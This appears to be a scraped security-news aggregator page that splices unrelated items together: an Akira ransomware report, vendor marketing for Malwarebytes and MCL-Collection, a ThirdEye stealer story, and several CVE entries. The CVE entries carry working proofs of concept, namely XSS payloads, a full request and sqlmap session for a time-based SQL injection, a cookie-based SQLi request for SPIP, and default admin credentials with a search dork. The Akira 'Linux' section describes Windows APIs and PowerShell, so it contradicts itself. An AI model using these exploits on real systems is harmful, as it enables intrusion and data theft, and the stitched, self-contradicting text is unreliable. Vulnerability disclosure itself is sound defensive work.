A new version of the double-extortion group's malware reflects a growing trend among ransomware actors to expand cybercrime opportunities beyond Windows.

The fledgling Akira ransomware group is building momentum and expanding its target base, following other cybercriminal groups by adding capabilities to exploit Linux systems as part of a growing sophistication in its activity, researchers have found.

The gang, which emerged as a cybercriminal force to be reckoned with in April of this year, is primarily known for attacking Windows systems, and maintains a unique data-leak site designed as an interactive command prompt using jQuery.

However, the group — named for a 1988 Japanese anime cult classic featuring a psychopathic biker — is now shifting its tactics to target Linux, with a new version of its ransomware that can exploit systems running the open source OS, researchers from Cyble Research and Intelligence Labs (CRIL) revealed in a blog post published June 29.

This move both reflects Akira's evolution as well as a growing trend among ransomware groups, who now see the opportunity in exploiting the popularity of Linux across enterprise environments. Linux has become the de facto standard for running virtual container-based systems, which are typically the back end for Internet of Things (IoT) devices and mission-critical applications.

"The fact that a previously Windows-centric ransomware group is now turning its attention to Linux underscores the increasing vulnerability of these systems to cyber threats," the researchers wrote in the post.

Indeed, the shift by Akira follows a move by other, more established ransomware — such as Cl0p, Royal, and IceFire ransomware groups — to do the same.

Akira is also expanding rapidly, having in just a few months already compromised 46 publicly disclosed victims — the majority of which are located in the US, the researchers said.

Victims span various industries, but the bulk of the victims have come from the education sector, followed close behind by manufacturing, professional services, BFSI, and construction. Other victims are scattered across assorted verticals, including agriculture and livestock, food and beverage, IT and ITES, real estate, consumer goods, automotive, chemical, and other industries, they said.

Akira primarily is focused on compromising and stealing data from its victims using double-extortion tactics, threatening to leak data on the Dark Web if they don't pay the requested ransom.

**How Akira's Linus-Targeting Works**

The new Linux ransomware file infects systems in the form of a console-based 64-bit executable written in Microsoft Visual C/C++ compiler, the researchers said. Upon execution, it uses the API function _GetLogicalDriveStrings()_ to obtain a list of the logical drives currently available in the system.

The malware then drops a ransom note in multiple folders with the file name "akira\_readme.txt," and proceeds to search for files and directories to encrypt by iterating through them using the API functions _FindFirstFileW()_ and _FindNextFileW()_.

The ransomware uses the "Microsoft Enhanced RSA and AES Cryptographic Provider" libraries to encrypt the victim's machine using a fixed hardcoded base64 encoded public key, renaming encrypted files with the ".akira" extension. It also uses several functions from CryptoAPI in its encryption process, the researchers said.

Akira ransomware also includes an additional features that prevents system restoration using a PowerShell command to execute a WMI query that deletes the shadow copy, they added.

The dropped ransom note provides instructions to the victims for contacting Akira to negotiate terms for paying a ransom. The group often threatens victims with plans to leak the data on its ransomware site (aka double extortion), which indeed displays a list of victims that didn't pay and associated leaks of their data, the researchers said.

**How to Prevent & Mitigate Ransomware**

Researchers made a number of recommendations for how organizations can prevent and mitigate ransomware attacks. They include conducting regular backup practices and keeping those backups offline or in a separate network so that systems can be restored in case of attack, they said.

Organizations also should turn on the automatic software update feature on computers as well as other mobile and connected devices wherever possible and pragmatic, and use reliable and trusted antivirus and Internet security software package on all connected devices, the researchers advised.

As ransomware often hitches a ride on files spread through phishing attacks, corporate users also should refrain from opening untrusted links and email attachments without verifying their authenticity, they added.

The steps taken after a ransomware attack also have an impact on how extensive the damage to a network is. If ransomware is detected on an enterprise system, organizations should immediately detach infected devices on the same network, disconnect any connected external storage devices, and inspect system logs for suspicious events, the researchers added.

Newbie Akira Ransomware Builds Momentum With Linux Shift

Categories: Business
#1 in Endpoint Protection, #1 ROI for Endpoint Management, #1 for EDR implementation.



(Read more...)




The post Top contenders in Endpoint Security revealed: G2 Summer 2023 results appeared first on Malwarebytes Labs.

Navigating the world of endpoint security is challenging, with numerous vendors stoking "Fear, Uncertainty, and Doubt" (FUD) and making bold claims that are difficult to verify. In times like these, the honest opinions of real users are invaluable for busy IT teams.

Enter G2, an industry-leading peer-to-peer review site. Each quarter, G2 releases reports highlighting the products with the highest customer satisfaction and strongest market presence.

In the G2 Summer 2023 Grid Reports, **Malwarebytes earned 19 "Leader" badges across five endpoint security categories (Antivirus, EDR, Endpoint Management, Endpoint protection platforms, Endpoint protection suites). We also received awards for the #1 spot in Endpoint Protection and the Easiest Setup for EDR, among many others**.

Let's take a closer look at how organizations evaluated solutions and what they said about using Malwarebytes.

****#1 Endpoint Protection: Highest Rated for Results, Relationship, and More****

Malwarebytes Endpoint Protection (EP), the essential foundation of our EDR and MDR offerings, won dozens of awards based on receiving the highest customer satisfaction score across a range of areas, including "Best Results," "Best Support," "Most Implementable," and more.

Dashboard for Nebula, the cloud-hosted security platform for EP and EDR

For example, Malwarebytes EP won the “**Best Results**” badge (highest overall Results score) by having the highest combination of estimated ROI, meets requirements, and likelihood to recommend scores. What some of our customers had to say:

> “Malwarebytes is easy to install and configure. It integrates with Windows 10 and runs silently in the background. Infection rate of Malware has dropped dramatically. If I run across a machine that has Malware, installing it cleans it up almost 100% of the time.”

Chris S.

> “Malwarebytes was able to detect and block a virus that our previous AV was not able to. Wish we had moved to this product sooner.”

Robert S.

> “I consider myself faithful to this software because Malwarebytes has taken me out of problems that other antivirus programs have not been able to solve. It is not a very heavy software and can run in the background without even noticing it thanks to the updates.”

Verónica M.

Customers also praised Malwarebytes for its friendly staff and exceptional support, for which we won the “**Best Relationship**” badge by having the highest combination of "Likely to Recommend," “Ease of business,” and “Quality of Support” ratings.

Here's what some of our customers had to say:

> “The support team started us off on the right track by getting us up and running in no time. Any questions I had before and after setup were answered quickly and thoroughly.”

Gary P.

> “Highly recommended, and their support team is the best you can ask for!”

Rifaat K.

****Easiest To Use EDR****

Our EDR solution, paired with our Vulnerability and Patch Management (VPM) modules, delivers an impressive return on investment by quickly enhancing your organization's security posture. Malwarebytes EDR is designed to be both efficient and cost-effective, allowing your team to see the benefits of your investment immediately.

By focusing on ease of use, quick implementation, and powerful security features without requiring an IT security army, Malwarebytes ensures that your organization is maximizing resources and receiving the best ROI in the industry.

Malwarebytes had the **best estimated ROI (payback period in months) in the enterprise Endpoint Management category, which evaluate products that help users keep track of devices in a system and ensure their software is secure and up to date**.

> “The best part about Malwarebytes is the set it and forget it. It has saved us so much time on deployment and remediation that it pays for itself in no time at all.”

Ron M.

> “It keeps our working environment much more secure than our previous solution. Much easier to manage in real time. This thing is a money saver and pays for itself.”

Tyson B.

**Most Implementable EDR: Seamless Setup and User-Friendly Experience**

On the Enterprise Implementation Index for Endpoint Detection & Response (EDR) Malwarebytes EDR clutched the #1 spot. With a seamless setup process, your team can spend more time focusing on what matters most: protecting your organization from cyber threats. Here’s how we won:

*   Malwarebytes EDR has an Implementation Score several points higher than the industry average.
*   Ease of Setup: Malwarebytes EDR scores several points higher than the industry average in ease of setup.
*   Average User Adoption: Malwarebytes EDR scores several points higher than the industry average in user adoption rate. 

> “The Nebula console is one of the most user-friendly interfaces we've come across. We can't recommend it enough.”

Justin N.

> “Malwarebytes makes it simple to deploy. Additionally, the user interface has minimal impact on the end-user, so its win-win. Support are happy to help when you do hit the occasional bump and the portal is easy to use and very responsive.”

John K.

> “If you are purchasing Malwarebytes, then you have made the correct choice. You will quickly see how easy it is to implement, and how great their support is.”

Mauro B.

> “Very easy to install and deploy, setup, and configure - for instance - a 5 machine setup would take roughly ~10 mins from start to finish.”

Verified User

> “Easy to use and implement, along with great support and support tools at your disposal, along with courses to help you become more familiar with the inner workings."

Doug C.

Two options to easily begin deployment with your endpoint users in Nebula

****Experience Malwarebytes for Business: Award-winning ROI, user-friendly, and effective threat defense****

Malwarebytes provides IT staff with award-winning business solutions, offering unmatched threat protection, a lightning-fast return on investment, and a smooth, speedy implementation.

Try Malwarebytes EDR today and join the ranks of those who have already discovered the amazing results, support, ROI, and more of our exceptional endpoint security solutions.

UPGRADE TO ENTERPRISE-GRADE PROTECTION

Top contenders in Endpoint Security revealed: G2 Summer 2023 results

A previously undocumented Windows-based information stealer called ThirdEye has been discovered in the wild with capabilities to harvest sensitive data from infected hosts.
Fortinet FortiGuard Labs, which made the discovery, said it found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Правила оформления больничных листов.pdf.exe," which translates to "CMK

A previously undocumented Windows-based information stealer called **ThirdEye** has been discovered in the wild with capabilities to harvest sensitive data from infected hosts.

Fortinet FortiGuard Labs, which made the discovery, said it found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Правила оформления больничных листов.pdf.exe," which translates to "CMK Rules for issuing sick leaves.pdf.exe."

The arrival vector for the malware is presently unknown, although the nature of the lure points to it being used in a phishing campaign. The very first ThirdEye sample was uploaded to VirusTotal on April 4, 2023, with relatively fewer features.

The evolving stealer, like other malware families of its kind, is equipped to gather system metadata, including BIOS release date and vendor, total/free disk space on the C drive, currently running processes, register usernames, and volume information. The amassed details are then transmitted to a command-and-control (C2) server.

A notable trait of the malware is that it uses the string "3rd\_eye" to beacon its presence to the C2 server.

There are no signs to suggest that ThirdEye has been utilized in the wild. That having said, given that a majority of the stealer artifacts were uploaded to VirusTotal from Russia, it's likely that the malicious activity is aimed at Russian-speaking organizations.

"While this malware is not considered sophisticated, it's designed to steal various information from compromised machines that can be used as stepping-stones for future attacks," Fortinet researchers said, adding the collected data is "valuable for understanding and narrowing down potential targets."

The development comes as trojanized installers for the popular Super Mario Bros video game franchise hosted on sketchy torrent sites are being used to propagate cryptocurrency miners and an open-source stealer written in C# called Umbral that exfiltrates data of interest using Discord Webhooks.

"The combination of mining and stealing activities leads to financial losses, a substantial decline in the victim's system performance, and the depletion of valuable system resources," Cyble said.

SeroXen infection chain

Video game users have also been targeted with Python-based ransomware and a remote access trojan dubbed SeroXen, which has been found to take advantage of a commercial batch file obfuscation engine known as ScrubCrypt (aka BatCloak) to evade detection. Evidence shows that actors associated with SeroXen's development have also contributed to the creation of ScrubCrypt.

The malware, which was advertised for sale on a clearnet website that was registered on March 27, 2023 prior to its shutdown in late May, has further been promoted on Discord, TikTok, Twitter, and YouTube. A cracked version of SeroXen has since found its way to criminal forums.

"Individuals are strongly advised to adopt a skeptical stance when encountering links and software packages associated with terms such as 'cheats,' 'hacks,' 'cracks,' and other pieces of software related to gaining a competitive edge," Trend Micro noted in a new analysis of SeroXen.

"The addition of SeroXen and BatCloak to the malware arsenal of malicious actors highlights the evolution of FUD obfuscators with a low barrier to entry. The almost-amateur approach of using social media for aggressive promotion, considering how it can be easily traced, makes these developers seem like novices by advanced threat actors' standards."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Newly Uncovered ThirdEye Windows-Based Malware Steals Sensitive Data

A Directory Browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.

**

Future proof your App development

****

Since it's inception in 1992 MCL-Collection with MCL-Designer is brought to market and has been adapted to the constant changing market requirements, MCL principles haven't.  
With the completely new developed MCL-Designer V4 we wanted to offer our customers with a more powerful and easier to use development environment while maintaining the key elements essential to MCL-Collection, including Cross-OS App development capabilities, intuitive what-you-see-is-what-you-get (WYSIWYG) visual app development and testing tools, and easier integration with Back-End systems.

Build your apps once and deploy to multiple mobile platforms including WinCE, WinMOB and Android.



**

*   **MCL-COLLECTION V4****A suite of products to BUILD-DEPLOY-RUN mobile applications**
    
    MCL-Designer, MCL-Loader, MCL-Client
    
    Find our more
    
*   **BE FUTURE PROOF****Build your App ONCE to deploy on multiple os platforms with ease**
    
    MCL-Designer will help you creating cross-os apps from a single project
    
    Find our more
    
*   **INTUITIVE DESIGN ENVIRONMENT****Build Apps efficiently and effectively**
    
    MCL-Designer offers one integrated Development Environment
    
    Find our more
    
*   **DEPLOY MULTI LINGUAL APPS****Maintain only ONE**
    
    See how MCL Designer let's you build Multilingual Apps with it's embedded localization options
    
    Read more
    
*   **EASY STAGING FOR YOUR MOBILE DEVICES USING MCL-LOADER****Utilize MCL-Loader and deploy your mobile apps effectively**
    
    See how MCL Loader can help you in setting up your mobile devices quickly
    
    Read more
    

**  
MCL-Designer V4 is a comprehensive enterprise mobility development solution which allows the rapid prototyping, design, development, testing of cross platform enterprise mobile datacapture applications.  
MCL-Designer, a zero code design environment, allows you to mobilize any datacapture (Barcode/RFID/Voice) business process on almost any mobile platform quickly and easily.**

**  
MCL-Loader offers Out-Of-the Box deployment capabilities for both Windows and Android devices. It let's you synchronize apps, data and other resources with your mobile devices and reduces the complexity of learning how each and every operating system (WinCE/WM/Android) is working.  
Deploying to only one or many devices has never been easier by utilizing MCL-Loader.**

  

**Mix and Match device types best fitting the needs of your mobile workers, seamlessly switch between communication options (WiFi, Ethernet, 3G/4G), and simply decide on how to exchange business data with your back-end systems.  
MCL-Applications will run optimized on industry equipment and will make your devices run at peak performance. You can choose from having your devices connected directly to your back-end systems or benefit from simplified and cost saving data-storage and exchange capabilities offered by MCL-Mobility Platform**

**

Technologies Embedded

**

*   **Barcode Datacapture****MCL supports natively the barcode scanner or imager coming with the mobile computer, bringing the best datacapture solutions to your mobile workers**
    
*   **Mobile Printing****MCL offers natively the possibility to connect mobile printers directly or through the wifi network and print new barcode labels, price tags, and more at the point of activity, bringing the best mobility solutions to your mobile workers**
    
*   **DataFile Sync****MCL offers quick and easy data synchronization with back-end systems. Our secured data transportation mechanisms maintains data integrity regardless of the transportation methods used, including WiFi or 3/4G internet connections**
    
*   **On-Line AND Off-Line****MCL offers native support for out-of-signal (WiFi/3G) situations and batch type of solutions. Your operators can continue their mobile tasks in off-line situations and sync their date once they are back in coverage. Typical batch applications, like inventory control, can be implemented easily with MCL's ready to go local data (on terminal side) and file sync options**
    
*   **RFID****MCL includes all common RFID functionality natively. You can develop apps including RDID which help you bringing the best RDID datacapture solutions to your mobile workers in no time**
    
*   **Signature Capture****MCL can help you bringing the best datacapture solutions to your mobile workers**
    
*   **Voice Recognition****MCL offers embedded voice recognition technologies to help you bringing the most optimized datacapture solutions to your mobile workers**
    
*   **Adaptive Screen Size****MCL allows the same app to run on different screen sizes, helping you bringing the best datacapture solutions to your mobile workers efficiently**
    
*   **GPS****MCL integrates natively the GPS capabilities offered by the device and helps you bringing the best technology solutions to your mobile workers**
    
*   **Database Integration****MCL integrates natively with the most common databases and helps you bringing the best technology solutions to your mobile workers**
    
*   **Wireless Connectivity****MCL offers extensive support for roaming between WiFi and 3G/4G networks seamlessly, bringing the best technology solutions to your mobile workers**
    
*   **Photo Camera****MCL offers native support for the camera capabilities offered by the device and helps you bringing the best technology solutions to your mobile workers**

CVE-2023-34834: MCL-Collection V4

Multiple cross-site scripting (XSS) vulnerabilities were discovered in Church CRM v4.5.3 in GroupReports.php via GroupRole, ReportModel, and OnlyCart parameters.

**If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**

**On what page in the application did you find this issue?**

/churchcrm/GroupReports.php

**On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?**

Linux

**What browser (and version) are you running?**

Firefox

**What version of PHP is the server running?**

7.4.33

**What version of SQL Server are you running?**

5.7.26

**What version of ChurchCRM are you running?**

4.5.3

Description:  
XSS was detected in GroupReports.php, three hidden parameters were found in the code of this page, in which this vulnerability is possible: GroupRole, ReportModel, OnlyCart. A browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.

Impact:  
The vulnerability allows an attacker to send malicious JavaScript code which could result in hijacking of the user's cookie/session tokens , redirecting the user to a malicious webpage, downloading malicious files hosted on attackers server and performing many other unintended browser actions

Proof of Concept:  
**<script>alert('XSS')</script>**

CVE-2023-33661: XSS exists in the group report page · Issue #6474 · ChurchCRM/CRM

Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.

\# Exploit Title:Lost and Found Information System v1.0 - Sql Injection # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html # Version: V1.0.0 # Tested on:Linux REQUEST POST /php-lfis/classes/SystemSettings.php?f=update\_settings HTTP/1.1 Host: localhost Content-Length: 454 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" Accept: application/json, text/javascript, \*/\*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2NerUgrr08nxdAqe X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-lfis/admin/?page=system\_info/contact\_information Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=fncg346s7j3fr654lsapbb8sqs Connection: close ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="phone" 1234567890 ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="mobile" 1234567890 ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="email" test1@test.com ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="address" test1 ------WebKitFormBoundary2NerUgrr08nxdAqe-- sqlmap -r lfis.txt --random-agent --batch -tamper=space2comment --dbs \[!\] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program \[\*\] starting @ 22:21:18 /2023-05-11/ \[22:21:18\] \[INFO\] parsing HTTP request from 'lfis.txt' \[22:21:18\] \[INFO\] loading tamper module 'space2comment' \[22:21:18\] \[INFO\] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30' from file '/usr/share/sqlmap/data/txt/user-agents.txt' Multipart-like data found in POST body. Do you want to process it? \[Y/n/q\] Y \[22:21:18\] \[INFO\] resuming back-end DBMS 'mysql' \[22:21:18\] \[INFO\] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: MULTIPART phone ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="phone''' AND (SELECT 1875 FROM (SELECT(SLEEP(5)))oGnm) AND 'hBeF'='hBeF ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="mobile" 1234567890 ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="email" test@test.com ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="address" test ------WebKitFormBoundarydhpsLF47Y6ZvrvP2-- --- \[22:21:18\] \[WARNING\] changes made by tampering scripts are not included in shown payload content(s) \[22:21:18\] \[INFO\] the back-end DBMS is MySQL web application technology: PHP 8.1.17, Apache 2.4.56 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) \[22:21:18\] \[INFO\] fetching database names \[22:21:18\] \[INFO\] fetching number of databases \[22:21:18\] \[WARNING\] time-based comparison requires larger statistical model, please wait.............................. (done) \[22:21:18\] \[WARNING\] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions \[22:21:18\] \[WARNING\] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' \[22:21:18\] \[ERROR\] unable to retrieve the number of databases \[22:21:18\] \[INFO\] falling back to current database \[22:21:18\] \[INFO\] fetching current database \[22:21:18\] \[INFO\] resumed: lfis\_db available databases \[1\]: \[\*\] lfis\_db \[22:21:18\] \[INFO\] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost' \[22:21:18\] \[WARNING\] your sqlmap version is outdated \[\*\] ending @ 22:21:18 /2023-05-11/

CVE-2023-33592: CVE/CVE-2023-33592 at main · DARSHANAGUPTA10/CVE

Emby Server versions < 4.6.0.50 is vulnerable to Cross Site Scripting (XSS) vulnerability via a crafted GET request to /web.

Two years ago I reported an issue regarding a Cross-Site Scripting vulnerability in the \*nux version of Emby Media Server:

    I found a Reflected Cross-Site Scripting as well. Everything after /web/ is reflected. See the attachments for an example: [http://<ip>:8096/web/<script>alert(document.location)</script>](http://<ip>:8096/web/%3Cscript%3Ealert(document.location)%3C/script%3E)
    
    EDIT: This issue only affects the *nux version of the app, the Windows version seems fine.
    

I tested this and I confirm that this issue has been resolved.  
This vulnerability is known as CVE-2021-25828.

CVE-2021-25828: Reflected Cross-Site Scripting (XSS) (CVE-2021-25828) · Issue #3785 · MediaBrowser/Emby

Zip and RAR FileExtractor version 5.7 suffers from a cross site scripting vulnerability.

    # Exploit Title: Zip & RAR FileExtractor  v5.7 - Reflected XSS# Vendor Homepage: Penghui Zhao# Software Link: https://apps.apple.com/tr/app/zip-rar-file-extractor/id769409043?l=en# Date: 2023-06-20# Exploit Author: tmrswrr# Category : ios app# Version: v5.7# Tested on: Windows/Linux## Description:>> Go to Wi-Fi Transfer section in zip rar file extractor app>> It will be create link : 192.168.1.104:8080>> When open link your browser , write payload, xss payload execute page and see alert buttonUrl: http://192.168.1.104:8080/download?path=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3EPayload: %22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E

Zip And RAR FileExtractor 5.7 Cross Site Scripting

SPIP version 4.2.3 suffers from a remote SQL injection vulnerability.

    ## Title: spip-v4.2.3 SQLi-cookie session vulnerability - Server SideSensitive information Disclosure!## Author: nu11secur1ty## Date: 06.28.2023## Vendor: https://www.spip.net/en_rubrique25.html## Software: https://files.spip.net/spip/archives/spip-v4.2.3.zip## Reference: https://portswigger.net/web-security/information-disclosure## Description:The spip_session cookie appears to be vulnerable to SQL injectionattacks. A single quote was submitted in the spip_session cookie, anda database error message was returned. Two single quotes were thensubmitted and the error message disappeared. You should review thecontents of the error message, and the application's handling of otherinput, to confirm whether a vulnerability is present.Additionally, the payload ' and '8025'='8025 were submitted in thespip_session cookie, and a database error message was returned.The attacker who has an account easily can dump almost all sensitiveinformation from the server. This is the wrong configuration of thesessions of this app and a serious bug in the backend execution -function modules of this app which bug is coming from the developmentteam of this web application! No one user account or even broadcastadmin account, must not be seeing inside information of the server,except on the layer 2 level, which must be a LOCAL ADMINISTRATOR! fromthe side of the developers of this web app.STATUS: HIGH-CRITICAL Vulnerability[+]Exploit:```GETGET /pwnedhost7/ecrire/?exec=info HTTP/1.1Host: 192.168.100.45Cookie: spip_admin=%40pwned%40pwned.com; spip_accepte_ajax=1;spip_session=1_c9209323400f315bb516fdc7c5345eaeCache-Control: max-age=0Sec-Ch-Ua:Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/spip-v4.2.3)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/06/spip-v423-sqli-cookie-session.html)## Time spend:03:15:00

SPIP 4.2.3 SQL Injection

AMSS++ version 2,0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : AMSS++ v 2.0 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar                                             |  | # Dork      : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Login : User = admin &  pass = 1234[+] http://127.0.0.1/pmss/index.php====Greetings to :=======================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh    |=========================================================================================================================================

Tag

#windows